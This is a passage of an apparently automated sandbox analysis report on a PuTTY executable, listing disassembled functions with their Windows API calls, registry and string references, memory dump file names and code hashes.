SendMessageA.USER32 ref: 00007FF6BB282961

Strings

(, xrefs: 00007FF6BB2828B2

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Cursor$InfoLongMessageMonitorSendShowWindowZoomed
String ID: (
API String ID: 3620415003-3887548279
Opcode ID: b8349ec93c4dddec6680e4932faa4de2be99d3b4fc5e745421a728c7658fe9e4
Instruction ID: 7ea4f3368f428a2d0f5d1de3ff5a41b2b192a0ceac83389b6eece98b8c9868cb
Opcode Fuzzy Hash: b8349ec93c4dddec6680e4932faa4de2be99d3b4fc5e745421a728c7658fe9e4
Instruction Fuzzy Hash: 78316F26B0D68A89FE208B18E9543BD6390FF88750F944434CB8DC66B5DF7CE484DB10

Function 00007FF6BB281F79 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

ShowCursor.USER32 ref: 00007FF6BB28286E
GetCursorPos.USER32 ref: 00007FF6BB282883
GetMonitorInfoA.USER32 ref: 00007FF6BB2828C8
IsZoomed.USER32 ref: 00007FF6BB28290B
GetWindowLongPtrA.USER32 ref: 00007FF6BB282921
SendMessageA.USER32 ref: 00007FF6BB282961

Strings

(, xrefs: 00007FF6BB2828B2

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Cursor$InfoLongMessageMonitorSendShowWindowZoomed
String ID: (
API String ID: 3620415003-3887548279
Opcode ID: d187b52f7d9aabdd4469402f5d2f178aab838f39d50d32413d2db247b8c1bdbe
Instruction ID: 658503719aa9cb413b32ce279d257fa8abeb971749ebb9db55150d2740c2a4df
Opcode Fuzzy Hash: d187b52f7d9aabdd4469402f5d2f178aab838f39d50d32413d2db247b8c1bdbe
Instruction Fuzzy Hash: 8C316026B0968989FE218B28E9543BD6390BF88760F944534CB9D866F4DF7CE484DB10

Function 00007FF6BB2C0E60 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 75networkCOMMON

Download Yara Rule

APIs

getpeername.WS2_32 ref: 00007FF6BB2C0E94
htons.WS2_32 ref: 00007FF6BB2C0F04
inet_ntoa.WS2_32 ref: 00007FF6BB2C0F17
htons.WS2_32 ref: 00007FF6BB2C0F58
inet_ntop.WS2_32 ref: 00007FF6BB2C0F77

Strings

%s:%d, xrefs: 00007FF6BB2C0F2D
[%s]:%d, xrefs: 00007FF6BB2C0F8D

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: htons$getpeernameinet_ntoainet_ntop
String ID: %s:%d$[%s]:%d
API String ID: 1060964792-2542140192
Opcode ID: ad6f839ef50679cd58f7acd2fb4b7e25080134479a6c9907d20a855d7e8855a4
Instruction ID: f5def6aabffaadff06add9252f83b6615658ff68572116674711d8b42968ecb3
Opcode Fuzzy Hash: ad6f839ef50679cd58f7acd2fb4b7e25080134479a6c9907d20a855d7e8855a4
Instruction Fuzzy Hash: 78314B32A1869286E7709F19E5143BE73A0FB88B44F508535DBCE876A5EF3CE485CB40

Function 00007FF6BB2BE090 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 66registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6BB2BDA70: GetEnvironmentVariableA.KERNEL32 ref: 00007FF6BB2BDC25
Part of subcall function 00007FF6BB2BDA70: GetEnvironmentVariableA.KERNEL32 ref: 00007FF6BB2BDC3B
Part of subcall function 00007FF6BB2BDA70: GetWindowsDirectoryA.KERNEL32 ref: 00007FF6BB2BDCA5

Part of subcall function 00007FF6BB2AAA80: CoCreateInstance.OLE32(?,?,?,?,?,?,00007FF6BB2BE0A2), ref: 00007FF6BB2AAAB3

Part of subcall function 00007FF6BB2C6460: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6BB38EAB3,00000000), ref: 00007FF6BB2C652D
Part of subcall function 00007FF6BB2C6460: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6BB38EAB3,00000000), ref: 00007FF6BB2C6576

RegCloseKey.ADVAPI32 ref: 00007FF6BB2BE0D5
RegDeleteKeyA.ADVAPI32 ref: 00007FF6BB2BE10C
RegCloseKey.ADVAPI32 ref: 00007FF6BB2BE121

Part of subcall function 00007FF6BB2BE190: RegDeleteKeyA.ADVAPI32 ref: 00007FF6BB2BE1B6
Part of subcall function 00007FF6BB2BE190: RegCloseKey.ADVAPI32(?,?,?,?,?,00007FF6BB2BE0D2), ref: 00007FF6BB2BE200

RegDeleteKeyA.ADVAPI32 ref: 00007FF6BB2BE16B

Strings

Software\SimonTatham, xrefs: 00007FF6BB2BE0E3
Software\SimonTatham\PuTTY, xrefs: 00007FF6BB2BE0AB
Software, xrefs: 00007FF6BB2BE142

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Close$Delete$CreateEnvironmentVariable$DirectoryInstanceWindows
String ID: Software$Software\SimonTatham$Software\SimonTatham\PuTTY
API String ID: 1055326402-1491235443
Opcode ID: 81ef892001f2c2f1c0cb7cd0e59f28a03b7942c1b0957569705c6f07a305703b
Instruction ID: f6c1e0f385be2168c2786fec49d15b05aaaa51fc1d20a14743fc322e77973bbe
Opcode Fuzzy Hash: 81ef892001f2c2f1c0cb7cd0e59f28a03b7942c1b0957569705c6f07a305703b
Instruction Fuzzy Hash: 0F218020E1920640F929A76D6B113F916807F8CBE4F504634DF1DCB7EAEE3DE4498345

Function 00007FF6BB2CB550 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 00007FF6BB2CB559
GetWindowLongPtrA.USER32 ref: 00007FF6BB2CB571
GetWindowLongPtrA.USER32 ref: 00007FF6BB2CB57E
SetWindowLongPtrA.USER32(?,?,00000000,00000000,?,?,00007FF6BB2A2915), ref: 00007FF6BB2CB5A3
SetWindowLongPtrA.USER32(?,?,00000000,00000000,?,?,00007FF6BB2A2915), ref: 00007FF6BB2CB5B1
SetWindowPos.USER32 ref: 00007FF6BB2CB5D7

Strings

', xrefs: 00007FF6BB2CB5B4

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Window$Long$Item
String ID: '
API String ID: 4195074732-1997036262
Opcode ID: ff309056fbe40a1bd499a135dda1d6c358370d1e2d7dd368e64aad0d5677229a
Instruction ID: 98cc9342600d3a4dd79b6c3dbd46db2f30995a806e23c354ea107a01e0d25fe3
Opcode Fuzzy Hash: ff309056fbe40a1bd499a135dda1d6c358370d1e2d7dd368e64aad0d5677229a
Instruction Fuzzy Hash: 05F06D2671559142EA109B7ABC14B5A7655BB8ABF4F688324EE3D47BE4CF3C84028B00

Function 00007FF6BB2A62A0 Relevance: 12.1, APIs: 8, Instructions: 78windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageA.USER32 ref: 00007FF6BB2A62D2
SendDlgItemMessageA.USER32 ref: 00007FF6BB2A62FE
SendDlgItemMessageA.USER32 ref: 00007FF6BB2A6318
SendDlgItemMessageA.USER32 ref: 00007FF6BB2A6331
SendDlgItemMessageA.USER32 ref: 00007FF6BB2A634B
SendDlgItemMessageA.USER32 ref: 00007FF6BB2A6364
SendDlgItemMessageA.USER32 ref: 00007FF6BB2A637D
SendDlgItemMessageA.USER32 ref: 00007FF6BB2A6397

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: ItemMessageSend
String ID:
API String ID: 3015471070-0
Opcode ID: 73568c77605bc6fd6541ec9f9058d5221844ba298cb5461979cc4e4bf4af6ae4
Instruction ID: c1cd145b5f0a9b6f1ecb36f5d8c2c31df09b6f8adf9acbc8457af6a8d91fce24
Opcode Fuzzy Hash: 73568c77605bc6fd6541ec9f9058d5221844ba298cb5461979cc4e4bf4af6ae4
Instruction Fuzzy Hash: A621B4227245604AE6709B07BD10FB69695BB8EFC8F084125BD8947F94CE7DC7069B44

Function 00007FF6BB341604 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 475COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BB341644
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BB3419F0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BB341C9B

Strings

p, xrefs: 00007FF6BB341742
p, xrefs: 00007FF6BB3416CA
f, xrefs: 00007FF6BB34173A

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$p$p
API String ID: 3215553584-1995029353
Opcode ID: e3bba9fd45495ca36409dd005eec057ab5bd93fa3575094083cb5e164e516708
Instruction ID: 034ac33596a33d6a231985688e81c76bfe9347501c816ed987d9d016abb7c2c1
Opcode Fuzzy Hash: e3bba9fd45495ca36409dd005eec057ab5bd93fa3575094083cb5e164e516708
Instruction Fuzzy Hash: B212D421E1CE4386FB245A5DE04677ABE91FB58754F884131E7CAC76E4DE3EE8808B44

Function 00007FF6BB2A89C3 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 187COMMON

Download Yara Rule

APIs

ChooseColorA.COMDLG32 ref: 00007FF6BB2A90E2

Strings

All Files (*.*), xrefs: 00007FF6BB2A8E67
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c, xrefs: 00007FF6BB2A9305
!c->data, xrefs: 00007FF6BB2A92FE

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: ChooseColor
String ID: !c->data$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$All Files (*.*)
API String ID: 2281747019-3574149933
Opcode ID: 2f349e4b6fcea049a0fd930034c1fded1ce6c352395f760d69894cb39ab3f3ff
Instruction ID: db0cd3d42428d54268760476ee919a88cd721e2e28042ed0bc1c0c17b9339d7d
Opcode Fuzzy Hash: 2f349e4b6fcea049a0fd930034c1fded1ce6c352395f760d69894cb39ab3f3ff
Instruction Fuzzy Hash: 99917D72A08A8185FB658B29E5453FA73A0FB98744F100136CB8D877A4DF7DE481CB40

Function 00007FF6BB2BDDA0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 159registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6BB2C6460: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6BB38EAB3,00000000), ref: 00007FF6BB2C652D
Part of subcall function 00007FF6BB2C6460: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6BB38EAB3,00000000), ref: 00007FF6BB2C6576

Part of subcall function 00007FF6BB2C6890: RegQueryValueExA.ADVAPI32(?,?,?,?,?,00000000,?,?,00007FF6BB2BDE03), ref: 00007FF6BB2C68CB
Part of subcall function 00007FF6BB2C6890: RegQueryValueExA.ADVAPI32 ref: 00007FF6BB2C6910

RegCloseKey.ADVAPI32 ref: 00007FF6BB2BDEDE
RegCloseKey.ADVAPI32 ref: 00007FF6BB2BDFF0

Strings

Software\SimonTatham\PuTTY\Jumplist, xrefs: 00007FF6BB2BDDD1
Software\SimonTatham\PuTTY\Sessions, xrefs: 00007FF6BB2BDFB5
Recent sessions, xrefs: 00007FF6BB2BDDF4, 00007FF6BB2BDEA3
Default Settings, xrefs: 00007FF6BB2BDF7E

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Close$QueryValue$Create
String ID: Default Settings$Recent sessions$Software\SimonTatham\PuTTY\Jumplist$Software\SimonTatham\PuTTY\Sessions
API String ID: 1827015023-773100466
Opcode ID: 83297036420e68c1fd3e84ba364cdf1dab0ea5c333bb827f060d8623946734ab
Instruction ID: 4bdf6a9ca360955810a8c8825ba5244d47b827e66eb8f603a31523d3eaaa2285
Opcode Fuzzy Hash: 83297036420e68c1fd3e84ba364cdf1dab0ea5c333bb827f060d8623946734ab
Instruction Fuzzy Hash: 2351A522A0D65241FA61DB1AAA513FA6390BF8CBD4F440531EF4D8B7BADF3CE4458740

Function 00007FF6BB34C854 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 157COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BB34C8CD
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BB34C91D
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BB34C965
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BB34C99D
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BB34CA10

Strings

MZx, xrefs: 00007FF6BB34C875

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: MZx
API String ID: 3215553584-2575928145
Opcode ID: 44fe7a646849c5250917b0abcb56b5858a23605b6b38837689ba037fe03d5c5b
Instruction ID: dc703704c1f2de15b7ece410822adbb17a12acf056160a51f13230fabd83eac4
Opcode Fuzzy Hash: 44fe7a646849c5250917b0abcb56b5858a23605b6b38837689ba037fe03d5c5b
Instruction Fuzzy Hash: 1D519732909B8696E7529F29D4503BD3BD4BF49B84F8D8031C78C973A6CE7EA855C702

Function 00007FF6BB2A8620 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 141registryclipboardCOMMON

Download Yara Rule

APIs

RegisterClipboardFormatA.USER32 ref: 00007FF6BB2A8669
SetMapMode.GDI32 ref: 00007FF6BB2A8737
GetTextExtentPoint32A.GDI32 ref: 00007FF6BB2A875A
DrawEdge.USER32 ref: 00007FF6BB2A8774
TextOutA.GDI32 ref: 00007FF6BB2A87D1

Strings

commctrl_DragListMsg, xrefs: 00007FF6BB2A8662

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Text$ClipboardDrawEdgeExtentFormatModePoint32Register
String ID: commctrl_DragListMsg
API String ID: 961708326-3283919134
Opcode ID: ead654770ffb4dceaf5522d17b49866591331b8bd34d4e29a9e10b257831ffd8
Instruction ID: 4d06d8e5716a782154416967c5994790e2c5e64691902da96a6a01fa1a220bd7
Opcode Fuzzy Hash: ead654770ffb4dceaf5522d17b49866591331b8bd34d4e29a9e10b257831ffd8
Instruction Fuzzy Hash: F951B262A0864586EA20DB19EA4077AB7A0FB8CF98F144135DF4D877A9DF7CE445CF00

Function 00007FF6BB2869C0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 130windowCOMMON

Download Yara Rule

APIs

DeleteMenu.USER32 ref: 00007FF6BB286B07
DeleteMenu.USER32 ref: 00007FF6BB286B18
MessageBoxA.USER32 ref: 00007FF6BB286BA4

Strings

%s Error, xrefs: 00007FF6BB286B44
Unable to open connection to%s%s, xrefs: 00007FF6BB286B68
Unable to open terminal:%s, xrefs: 00007FF6BB286B7C

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: DeleteMenu$Message
String ID: %s Error$Unable to open connection to%s%s$Unable to open terminal:%s
API String ID: 1035315089-2786405544
Opcode ID: b435416d0079812654ad5947054f8ee94bf0debb7ab9021b2e37498e67299442
Instruction ID: 2135523fd313093e76a78d5a4790f44d8e750ce5846c61c623948841546beb77
Opcode Fuzzy Hash: b435416d0079812654ad5947054f8ee94bf0debb7ab9021b2e37498e67299442
Instruction Fuzzy Hash: B0512C25A1CA4681EA00EB2DED512BE6791BF8CBD0F544432DB4DD7BB6DE7CE4418B40

Function 00007FF6BB2B4B20 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 00007FF6BB2B4C10
GetLastError.KERNEL32 ref: 00007FF6BB2B4C9A

Part of subcall function 00007FF6BB2B4E40: GetCommState.KERNEL32 ref: 00007FF6BB2B4E69

Part of subcall function 00007FF6BB2F9480: CreateEventA.KERNEL32 ref: 00007FF6BB2F94D4
Part of subcall function 00007FF6BB2F9480: InitializeCriticalSection.KERNEL32 ref: 00007FF6BB2F9534
Part of subcall function 00007FF6BB2F9480: CreateEventA.KERNEL32 ref: 00007FF6BB2F9544
Part of subcall function 00007FF6BB2F9480: CreateThread.KERNEL32 ref: 00007FF6BB2F9583
Part of subcall function 00007FF6BB2F9480: CloseHandle.KERNEL32 ref: 00007FF6BB2F9591

Part of subcall function 00007FF6BB2F9120: CreateEventA.KERNEL32 ref: 00007FF6BB2F9174
Part of subcall function 00007FF6BB2F9120: InitializeCriticalSection.KERNEL32 ref: 00007FF6BB2F91BD
Part of subcall function 00007FF6BB2F9120: CreateEventA.KERNEL32 ref: 00007FF6BB2F91CD
Part of subcall function 00007FF6BB2F9120: CreateThread.KERNEL32 ref: 00007FF6BB2F920C
Part of subcall function 00007FF6BB2F9120: CloseHandle.KERNEL32 ref: 00007FF6BB2F921A

Strings

Opening '%s': %s, xrefs: 00007FF6BB2B4CA7
Opening serial device %s, xrefs: 00007FF6BB2B4BA6
\\.\, xrefs: 00007FF6BB2B4BC5
%s%s, xrefs: 00007FF6BB2B4BD7

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Create$Event$CloseCriticalHandleInitializeSectionThread$CommErrorFileLastState
String ID: %s%s$Opening '%s': %s$Opening serial device %s$\\.\
API String ID: 2954106191-1737485005
Opcode ID: 07b2e637a231ce6fe829028095a14c8fec710d10f8b86921e05ae9d257ab1a38
